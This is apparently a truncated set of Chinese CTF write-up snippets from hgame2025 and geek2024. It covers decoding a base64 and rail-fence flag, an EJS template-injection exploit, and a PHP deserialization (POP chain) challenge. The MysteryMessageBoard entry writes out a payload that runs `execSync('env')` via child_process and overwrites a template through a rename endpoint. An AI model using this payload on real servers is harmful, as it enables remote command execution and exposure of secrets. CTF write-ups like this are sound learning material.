hgame2025
Level 24 Pacman直接看index.js中有一段 here is your gift:aGFldTRlcGNhXzR0cmdte19yX2Ftbm1zZX0= base64解码得: haeu4epca_4trgm{_r_amnmse} 观察应该是栅栏密码比较短,直接人肉还原一下: haeu4epca_4trgm{_r_amnmse} 然后竖着读 hgame{u_4re_pacman_m4ster} Level 69 MysteryMessageBoard看题干以及代码,发现直接加载mortis.ejs运行,那么尝试进行覆盖先构造: <%- global.process.mainModule.require('child_process').execSync('env') %> 上传后使用rename接口进行覆盖,尝试了几次后这个路径覆盖成功: import requestsurl =...
geek2024
ezpop题目: <?phpClass SYC{ public $starven; public function __call($name, $arguments){ if(preg_match('/%|iconv|UCS|UTF|rot|quoted|base|zlib|zip|read/i',$this->starven)){ die('no hack'); } file_put_contents($this->starven,"<?php exit();".$this->starven); }}Class lover{ public $J1rry; public $meimeng; public function __destruct(){ ...
